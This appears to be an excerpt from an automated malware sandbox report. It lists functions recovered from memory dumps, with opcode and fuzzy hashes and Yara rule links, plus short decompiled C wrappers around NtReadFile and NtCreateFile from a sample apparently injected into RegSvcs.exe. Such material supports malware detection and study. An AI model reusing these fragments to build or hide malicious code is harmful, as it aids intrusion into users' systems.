                                                                                                                                                      • Instruction ID: d861fca0d7ec895e442acf4e34459a0b2879504f1f566164de275b84f4f02ba1
                                                                                                                                                      • Opcode Fuzzy Hash: 270eeda057235de038e297ebc3dd78c4ef4841226bf0dc66b9af98aeccc9b1fa
                                                                                                                                                      • Instruction Fuzzy Hash: 1D018470E49208AFCF04DFF58851AADBBB2EF8A304F1484AAC405EB241D7340A45CB56
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00890292, Relevance: .0, Instructions: 39COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 50ca920ad83fab228ecd371e88d444d80de7af768ec15ab01009586c535f1610
                                                                                                                                                      • Instruction ID: 175d4f5eef84c91a47795affbbe5edd346c93f8bf6b1bc4a9dafac50f8ac8168
                                                                                                                                                      • Opcode Fuzzy Hash: 50ca920ad83fab228ecd371e88d444d80de7af768ec15ab01009586c535f1610
                                                                                                                                                      • Instruction Fuzzy Hash: A511EE30909228CFCF24DFA4C984BECBBB1FB19318F1440AAD049A7291C731AA99DF01
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 008907AB, Relevance: .0, Instructions: 35COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: a40d64dba5547dbef03f4bf59d31487319e4f9b481e33d57a742b8128ffcea7b
                                                                                                                                                      • Instruction ID: d7d39cd30ec14e55f74ae3494763c87d3b41a93cb03803e0ada997775f5b9d63
                                                                                                                                                      • Opcode Fuzzy Hash: a40d64dba5547dbef03f4bf59d31487319e4f9b481e33d57a742b8128ffcea7b
                                                                                                                                                      • Instruction Fuzzy Hash: 3C019234904228CFCB64EF60DD887ECBBB9EB55315F2445EA840AB7295DB705AC9DF00
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 008900B1, Relevance: .0, Instructions: 35COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fd884178b68436c6ff45c3d6b2219f27ed220f565dd6ad003bec7e59b22d4305
                                                                                                                                                      • Instruction ID: 23ead4b9aa0135db489d95edb0bae2f79cd3109e4f62cc00c11e78fde79f99a8
                                                                                                                                                      • Opcode Fuzzy Hash: fd884178b68436c6ff45c3d6b2219f27ed220f565dd6ad003bec7e59b22d4305
                                                                                                                                                      • Instruction Fuzzy Hash: 7301F271608218AFEB20DF54DC81BD9BBB5FB09314F24009AE289AB281C7716A91DF18
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00891332, Relevance: .0, Instructions: 26COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 232ad55eb3412af1f67a17d59d1f41ff0ee981e6dc21a2226c0a873f0159e4a9
                                                                                                                                                      • Instruction ID: 440397d47c090611c4ed7b7d4373a70bc800e3d633e0d2ccbb0b272edf149a25
                                                                                                                                                      • Opcode Fuzzy Hash: 232ad55eb3412af1f67a17d59d1f41ff0ee981e6dc21a2226c0a873f0159e4a9
                                                                                                                                                      • Instruction Fuzzy Hash: B2F03930909248DFCB05DFA4D8856ECBBB0EF4A314F2880EAC85C97392C6394A86DF41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0089146F, Relevance: .0, Instructions: 25COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 698fdd359308513197dd56e24af5921adb7a84d16aa417b9a826745aed2f7aca
                                                                                                                                                      • Instruction ID: cd75abb2bbba51a0996374a1d415308e724e10ac23bdea55b80934969177ba04
                                                                                                                                                      • Opcode Fuzzy Hash: 698fdd359308513197dd56e24af5921adb7a84d16aa417b9a826745aed2f7aca
                                                                                                                                                      • Instruction Fuzzy Hash: 4DE04F2448E2888FCB16CEB468955FD7F38AB07314F2510DFC409A75A2C629090A8B16
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 008911C8, Relevance: .0, Instructions: 24COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3265ab62b783a9b22631ae34790a36cc73f151641823e6f60c9dd1ad64b32dec
                                                                                                                                                      • Instruction ID: da95f7cd3f1c28fd3844e6ee5500813eee1d0931c75f0923484be1f0caaa9918
                                                                                                                                                      • Opcode Fuzzy Hash: 3265ab62b783a9b22631ae34790a36cc73f151641823e6f60c9dd1ad64b32dec
                                                                                                                                                      • Instruction Fuzzy Hash: FAF0F234904208EFCF00DFD8D844AACBBB5FB48304F14C09AA91897351C7329A61EF80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 008903C6, Relevance: .0, Instructions: 24COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ad6012459d729989bcc22153565929f54587354a587da21304946339a1728b0a
                                                                                                                                                      • Instruction ID: bb0dc9cc59821b6b387e1840d9f390c1f9f31697e44deb382dee11df1ef16c84
                                                                                                                                                      • Opcode Fuzzy Hash: ad6012459d729989bcc22153565929f54587354a587da21304946339a1728b0a
                                                                                                                                                      • Instruction Fuzzy Hash: 80F0DF75908218CFDB24DF64CA80BE8B7B5FB58314F14819AE548E7281C735AE95CF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 008912F0, Relevance: .0, Instructions: 21COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 2ad131fd9e10acd487d444a6fa8e4ae6ab087aba9e560cb6d1a7fd898d720a56
                                                                                                                                                      • Instruction ID: 4c958fa1a94fac270f0e1c1644ad55014c2f7f7336c011b0723f5275385df184
                                                                                                                                                      • Opcode Fuzzy Hash: 2ad131fd9e10acd487d444a6fa8e4ae6ab087aba9e560cb6d1a7fd898d720a56
                                                                                                                                                      • Instruction Fuzzy Hash: 6DE0E574908208EFCB04DFE9D544AACFBB4EB48305F14C0AAD85997341C7359A91EF84
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00891340, Relevance: .0, Instructions: 20COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7d76baabb58b04f00f2b5dfa189e10f22e88b04401435deae89f465b275af27c
                                                                                                                                                      • Instruction ID: fa4c574c1f72f534c9514df569828a4ea2f8c774a9efb4dd060643bf83546783
                                                                                                                                                      • Opcode Fuzzy Hash: 7d76baabb58b04f00f2b5dfa189e10f22e88b04401435deae89f465b275af27c
                                                                                                                                                      • Instruction Fuzzy Hash: 3CE09A74D09108EFCB04DF99D5456ACF7B4EB49304F14C1A9D81C97741D7355A41EF85
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 008913B8, Relevance: .0, Instructions: 18COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 98ee259cea6dc3456ea905507461f48fdc2a1c62d7a50f70e366c4d3affc1310
                                                                                                                                                      • Instruction ID: b50909eadc8d73a698d32993435bbd8b99c615f1d7307f197c5beb4a88d08459
                                                                                                                                                      • Opcode Fuzzy Hash: 98ee259cea6dc3456ea905507461f48fdc2a1c62d7a50f70e366c4d3affc1310
                                                                                                                                                      • Instruction Fuzzy Hash: 7ED05E3409E3C28ECB0617A16C2C2A83FB49B1332AB18188FC449D69A3C29C00C6DB11
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00891480, Relevance: .0, Instructions: 16COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c2b6cbfbae6c3dae75046ba6aaa97c4da5721e4c796f3964a1f27afeb8c7c565
                                                                                                                                                      • Instruction ID: 4f73e0c449933225a3dceb315e659706cb6b46f97d2a481e67cf8027731c4a10
                                                                                                                                                      • Opcode Fuzzy Hash: c2b6cbfbae6c3dae75046ba6aaa97c4da5721e4c796f3964a1f27afeb8c7c565
                                                                                                                                                      • Instruction Fuzzy Hash: 6AD0A93084E20DDBCB28EEA98808ABDB76CEB0A708F205098850C63210CB300D408A5A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 008913C8, Relevance: .0, Instructions: 12COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4fabb411c41535d8e874ff04708aec859b2a155f8e6c4c8b0f37edd6ea706ff5
                                                                                                                                                      • Instruction ID: e4fd075783f2d8ad441dcbad9f35a85186e91f03b8e24b03bc62335029783055
                                                                                                                                                      • Opcode Fuzzy Hash: 4fabb411c41535d8e874ff04708aec859b2a155f8e6c4c8b0f37edd6ea706ff5
                                                                                                                                                      • Instruction Fuzzy Hash: 65C08C3405E20ACACA042796A80C374727CE70230AF482814460DA2E2287A40080EA54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00891770, Relevance: .0, Instructions: 7COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7f3171a4354616ef8076911d49928754b6fc478468f1d92d1a1d220055c0785f
                                                                                                                                                      • Instruction ID: 8eb3a6e818fb5f8f42021974e460add835789e8bd81d91aaa2366e627bdc4b36
                                                                                                                                                      • Opcode Fuzzy Hash: 7f3171a4354616ef8076911d49928754b6fc478468f1d92d1a1d220055c0785f
                                                                                                                                                      • Instruction Fuzzy Hash: 1DC002B4D052198BEF60DF64D948B88BBB0FB54308F155196994AE2201D63409869F04
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 00891850, Relevance: 2.6, Strings: 2, Instructions: 122COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: MseG$MseG
                                                                                                                                                      • API String ID: 0-3680676839
                                                                                                                                                      • Opcode ID: 978176fdef04f659e86d368587b816c2eed4a551e83e0aa8c77da940539896b9
                                                                                                                                                      • Instruction ID: 18103cdebb97d2f90c77bc31470884a025296965065a95360e767872f46ee733
                                                                                                                                                      • Opcode Fuzzy Hash: 978176fdef04f659e86d368587b816c2eed4a551e83e0aa8c77da940539896b9
                                                                                                                                                      • Instruction Fuzzy Hash: E7414C70E0921ADBCF04DFA9D5886EDFAB6FB89314F289429D406B7254D7348940DF24
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003ACC40, Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @2Om
                                                                                                                                                      • API String ID: 0-3646814448
                                                                                                                                                      • Opcode ID: 117ce00b59e53507bb627227dc962c169265cb7394bb520493fa167ffd1002b5
                                                                                                                                                      • Instruction ID: c017fa1c09ff48847f4db9454f07fd2c398b79742bb45db24fa2e51bcb4c8119
                                                                                                                                                      • Opcode Fuzzy Hash: 117ce00b59e53507bb627227dc962c169265cb7394bb520493fa167ffd1002b5
                                                                                                                                                      • Instruction Fuzzy Hash: 97514A7090420DCFD755EFB9D884BAEBBF7EB88308F008939D0089B224DB7459868F91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A43C0, Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @2Om
                                                                                                                                                      • API String ID: 0-3646814448
                                                                                                                                                      • Opcode ID: 528e0b3fe150174e97c2111d863ba203dd22f511c6fadd7d6f67c940d16fca38
                                                                                                                                                      • Instruction ID: 6cb00d881743826f22b5eaca65ac134861bc4b7a8fe6adfa6439cd51869a2994
                                                                                                                                                      • Opcode Fuzzy Hash: 528e0b3fe150174e97c2111d863ba203dd22f511c6fadd7d6f67c940d16fca38
                                                                                                                                                      • Instruction Fuzzy Hash: 15510C74900209CBD749EFB5D890A9EBBFBEFC9304F04C939D0199B264DB7159868B92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04430048, Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: #
                                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                                      • Opcode ID: 3dbe0a7433f7adc62b8cccbdc6e7897f1657625249e838833add19b562ebb38f
                                                                                                                                                      • Instruction ID: c5c40fab15540e17e9924e25ba8848cef22b348e331e2c6d7f8121c3e5892aec
                                                                                                                                                      • Opcode Fuzzy Hash: 3dbe0a7433f7adc62b8cccbdc6e7897f1657625249e838833add19b562ebb38f
                                                                                                                                                      • Instruction Fuzzy Hash: F7416FB1E056588BEB1CCF6BCD4078EFAF3BFC9200F14C5BA950DAA214DB7059868E15
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04430046, Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: #
                                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                                      • Opcode ID: f64155e89c7d1ed603ffd0436c8b9500d18e8cfb9602e088cdc59b6905967034
                                                                                                                                                      • Instruction ID: b2ab7cc9a70e4152f76dcfd24d148b48e62cf3c78b9e294e3f3adb960d7e8a9c
                                                                                                                                                      • Opcode Fuzzy Hash: f64155e89c7d1ed603ffd0436c8b9500d18e8cfb9602e088cdc59b6905967034
                                                                                                                                                      • Instruction Fuzzy Hash: 1C4124B1E056588BEB5CCF6BCD4068EFAF3AFC9200F14C5BA950DA6214DB7409868F15
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003AA728, Relevance: .2, Instructions: 222COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e0a0590b7fa4d49b33f736017bb16822bd070d9dfc93b9fb515c9d1c67c36530
                                                                                                                                                      • Instruction ID: 9efb7528b228ca16afb43f33b2a0e543212053f700c9ffa2efbd409a1b630507
                                                                                                                                                      • Opcode Fuzzy Hash: e0a0590b7fa4d49b33f736017bb16822bd070d9dfc93b9fb515c9d1c67c36530
                                                                                                                                                      • Instruction Fuzzy Hash: 6E911271E00619CFCB05DFE9C484A9EBBFAFF8A314F658029D408AB345E7349942CB52
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Analysis Process: RegSvcs.exe PID: 2344 Parent PID: 2884 RegSvcs.exeCOMMON

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 37%
                                                                                                                                                      			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                                                                                      0x00419e03
                                                                                                                                                      0x00419e0f
                                                                                                                                                      0x00419e17
                                                                                                                                                      0x00419e22
                                                                                                                                                      0x00419e3d
                                                                                                                                                      0x00419e45
                                                                                                                                                      0x00419e49

                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID: 2MA$2MA
                                                                                                                                                      • API String ID: 2738559852-947276439
                                                                                                                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                      • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                                                                                                                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                      • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00419DFE, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35filenativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 37%
                                                                                                                                                      			E00419DFE(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t29;
				void* _t31;

				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, 0xec8b550f, _t31); // executed
				return _t18;
			}







                                                                                                                                                      0x00419e03
                                                                                                                                                      0x00419e0f
                                                                                                                                                      0x00419e17
                                                                                                                                                      0x00419e22
                                                                                                                                                      0x00419e3d
                                                                                                                                                      0x00419e45
                                                                                                                                                      0x00419e49

                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID: 2MA$2MA
                                                                                                                                                      • API String ID: 2738559852-947276439
                                                                                                                                                      • Opcode ID: 617284fe934c933324e973a831cc1cf02747c2edafee5f07066d04ef82f4e86b
                                                                                                                                                      • Instruction ID: 00c91bf5186e13c8f3e0094703864e9394cd14fab2ca2074de922b77fcf32330
                                                                                                                                                      • Opcode Fuzzy Hash: 617284fe934c933324e973a831cc1cf02747c2edafee5f07066d04ef82f4e86b
                                                                                                                                                      • Instruction Fuzzy Hash: 47F0A4B6200108AFCB14DF89DC91EEB77A9AF8C354F168649BA1DA7251C630E8518BA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                                                      0x00419d5f
                                                                                                                                                      0x00419d67
                                                                                                                                                      0x00419d89
                                                                                                                                                      0x00419d9d
                                                                                                                                                      0x00419da1

                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: wKA
                                                                                                                                                      • API String ID: 823142352-3165208591
                                                                                                                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                      • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                                                                                                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                      • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00419D4B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                      			E00419D4B(void* __edi, void* __esi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t22;
				void* _t34;
				signed int _t37;

				_t34 = __esi + __edi;
				_t37 =  *(__edi - 0x1374aac3) * 0x8b08458b;
				_push(_t37);
				_t16 = _a4;
				_push(_t34);
				_t4 = _t16 + 0xc40; // 0xc40
				E0041A950(__edi, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t12 =  &_a20; // 0x414b77
				_t22 = NtCreateFile(_a8, _a12, _a16,  *_t12, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}






                                                                                                                                                      0x00419d4b
                                                                                                                                                      0x00419d4d
                                                                                                                                                      0x00419d50
                                                                                                                                                      0x00419d53
                                                                                                                                                      0x00419d59
                                                                                                                                                      0x00419d5f
                                                                                                                                                      0x00419d67
                                                                                                                                                      0x00419d89
                                                                                                                                                      0x00419d9d
                                                                                                                                                      0x00419da1

                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: wKA
                                                                                                                                                      • API String ID: 823142352-3165208591
                                                                                                                                                      • Opcode ID: 5698370e93231dcaa876b0b3758a9e2ed387f1f8c0451b227f6c083057958c12
                                                                                                                                                      • Instruction ID: 04a2cfd867437525a0971d93455d764c76a25f5f1e9e2778de588e1df1fbb764
                                                                                                                                                      • Opcode Fuzzy Hash: 5698370e93231dcaa876b0b3758a9e2ed387f1f8c0451b227f6c083057958c12
                                                                                                                                                      • Instruction Fuzzy Hash: 72F0F6B2204149ABCB08DF98DC85CDBB7ADBF8C354B05864DFA5C93201D630E8508BA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

